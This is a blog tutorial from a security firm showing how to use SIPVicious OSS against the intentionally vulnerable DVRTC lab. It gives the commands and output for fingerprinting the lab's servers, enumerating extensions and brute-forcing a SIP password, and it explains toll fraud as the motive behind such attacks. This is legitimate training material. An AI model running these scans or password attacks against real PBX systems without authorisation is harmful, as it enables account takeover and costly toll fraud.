---
title: SIPVicious tutorial: testing VoIP security with DVRTC
date: 2026-04-13
url: /blog/sipvicious-tutorial-voip-security-testing-with-dvrtc.md
---

## TL;DR

We use [SIPVicious OSS](https://github.com/enablesecurity/sipvicious) to scan, enumerate extensions, and crack passwords on our [DVRTC](https://github.com/EnableSecurity/DVRTC/) vulnerable lab at `pbx1.dvrtc.net`. If you want to get your hands dirty with VoIP security testing, this is a good place to start.

## Background

Back in 2020, our colleague Pinaki wrote a [tutorial on attacking a VoIP system with SIPVicious OSS](https://www.enablesecurity.com/blog/attacking-real-voip-system-with-sipvicious-oss.md) using our old demo server at `demo.sipvicious.pro`. That server has since been retired.

We now have something much better: [DVRTC (Damn Vulnerable Real-Time Communications)](https://www.enablesecurity.com/blog/introducing-dvrtc-damn-vulnerable-real-time-communications.md), a full vulnerable VoIP/WebRTC lab with guided exercises and a public instance at [pbx1.dvrtc.net](https://pbx1.dvrtc.net). DVRTC packs Kamailio, Asterisk, rtpengine, coturn, and more. All intentionally misconfigured for training purposes.

This post focuses on the SIPVicious OSS basics. For the full range of exercises (RTP bleed, TURN abuse, digest leak, and more), check the [DVRTC exercise docs](https://github.com/EnableSecurity/DVRTC/blob/main/docs/pbx1/exercises/).

## Getting started

SIPVicious OSS (SVOSS) is [freely available](https://github.com/enablesecurity/sipvicious) on our [GitHub](https://github.com/enablesecurity). Install it with:

```bash
pip install sipvicious
```

Make sure you have the latest version (v0.3.7 at time of writing):

```bash
sipvicious_svmap --version
```

You'll need Python 3.6 or later. For full details, see the [installation wiki](https://github.com/EnableSecurity/sipvicious/wiki/Basics#installation).

## Reconnaissance with svmap

The first step in any [VoIP pentest](https://www.enablesecurity.com/voip-penetration-testing.md) is figuring out what we're dealing with. Let's map our target with `svmap`:

```bash
sipvicious_svmap pbx1.dvrtc.net
```

```
+---------------------+---------------------------------+
| SIP Device          | User Agent                      |
+=====================+=================================+
| 139.162.183.14:5060 | kamailio (6.1.1 (x86_64/Linux)) |
+---------------------+---------------------------------+
```

So we have a Kamailio 6.1.1 server handling SIP over UDP, sitting in front of the rest of the stack as a SIP proxy.

Now, what happens when we target a specific extension? Let's try `1000`:

```bash
sipvicious_svmap pbx1.dvrtc.net -e 1000
```

```
+---------------------+---------------------------------------------+
| SIP Device          | User Agent                                  |
+=====================+=============================================+
| 139.162.183.14:5060 | Asterisk PBX 22.8.2+dfsg+~cs6.15.60671435-1 |
+---------------------+---------------------------------------------+
```

A completely different User-Agent! The request for extension `1000` gets routed through Kamailio to an Asterisk PBX behind it. This is a pretty standard SIP proxy + PBX deployment. From the perspective of a pentester, knowing what sits behind the proxy is valuable information, and in this case the routing through Kamailio reveals exactly what's behind it.

## Enumerating extensions with svwar

Now that we have a feel for the target, let's enumerate the extensions with `svwar`:

```bash
sipvicious_svwar pbx1.dvrtc.net -e 1000-2000
```

```
+-----------+----------------+
| Extension | Authentication |
+===========+================+
| 1000      | reqauth        |
+-----------+----------------+
| 1100      | reqauth        |
+-----------+----------------+
| 1200      | reqauth        |
+-----------+----------------+
| 1300      | reqauth        |
+-----------+----------------+
| 2000      | reqauth        |
+-----------+----------------+
```

`svwar` found 5 extensions, all requiring authentication. It works by sending SIP REGISTER requests and looking at what comes back: a `401` means the extension exists (but needs credentials), while a `404` means it doesn't. In fact, if you run `svwar` with the `-vv` flag, you'll notice the server responds with `404 enumerate me baby` for invalid extensions. Yes, that's intentional ;-)

## Cracking passwords with svcrack

We have extensions, so the obvious next question is: do any of them have weak passwords? That's what `svcrack` is for. Let's try the default numeric range first:

```bash
sipvicious_svcrack pbx1.dvrtc.net -u 1000 -v
```

```
INFO:ASipOfRedWine:trying to get self ip .. might take a while
INFO:root:scan started at 2026-04-12 16:25:39.014348
INFO:ASipOfRedWine:no more passwords
WARNING:root:found nothing
INFO:root:Total time: 0:00:18.189742
```

Nothing. The default password set is a numeric range from 100 to 999, which isn't large enough. Let's try the `--enabledefaults` flag, which adds common passwords (including the extension number itself and predictable patterns):

```bash
sipvicious_svcrack pbx1.dvrtc.net -u 1000 --enabledefaults -v
```

```
INFO:ASipOfRedWine:trying to get self ip .. might take a while
INFO:root:scan started at 2026-04-12 16:25:12.235809
INFO:ASipOfRedWine:The password for 1000 is 1500
INFO:root:we have 1 cracked users
INFO:root:Total time: 0:00:00.168962
+-----------+----------+
| Extension | Password |
+===========+==========+
| 1000      | 1500     |
+-----------+----------+
```

There we go! Extension `1000` has a password of `1500`. You could also find this by specifying a custom numeric range with `--range`:

```bash
sipvicious_svcrack pbx1.dvrtc.net -u 1000 --range 1000-2000 -v
```

```
INFO:ASipOfRedWine:trying to get self ip .. might take a while
INFO:root:scan started at 2026-04-12 16:25:25.094604
INFO:ASipOfRedWine:The password for 1000 is 1500
INFO:root:we have 1 cracked users
INFO:root:Total time: 0:00:04.524195
+-----------+----------+
| Extension | Password |
+===========+==========+
| 1000      | 1500     |
+-----------+----------+
```

## What can an attacker do with SIP credentials?

On a production PBX connected to PSTN, the most common outcome is toll fraud: the attacker registers with the stolen extension and starts making international or premium-rate calls. The victim gets stuck with the phone bill. We've seen cases where this leads to tens of thousands in charges over a weekend. It's been happening for years and it's still one of the most common VoIP attacks.

DVRTC is not connected to PSTN (of course), so no expensive calls here. But the techniques are the same ones an attacker would use against a real target.

## Going further

This tutorial only covers the basics. DVRTC has [7 exercises](https://github.com/EnableSecurity/DVRTC/blob/main/docs/pbx1/exercises/) covering 12 attack paths, including traffic analysis, RTP bleed, SIP digest leak, TURN relay abuse, and offline credential cracking. You can also [run your own DVRTC instance](https://github.com/EnableSecurity/DVRTC/) locally with Docker Compose if you want a private lab to experiment with.

Of course, if what you actually need is a professional [VoIP penetration testing](https://www.enablesecurity.com/voip-penetration-testing.md) service, [get in touch](https://www.enablesecurity.com/contact.md) ;-)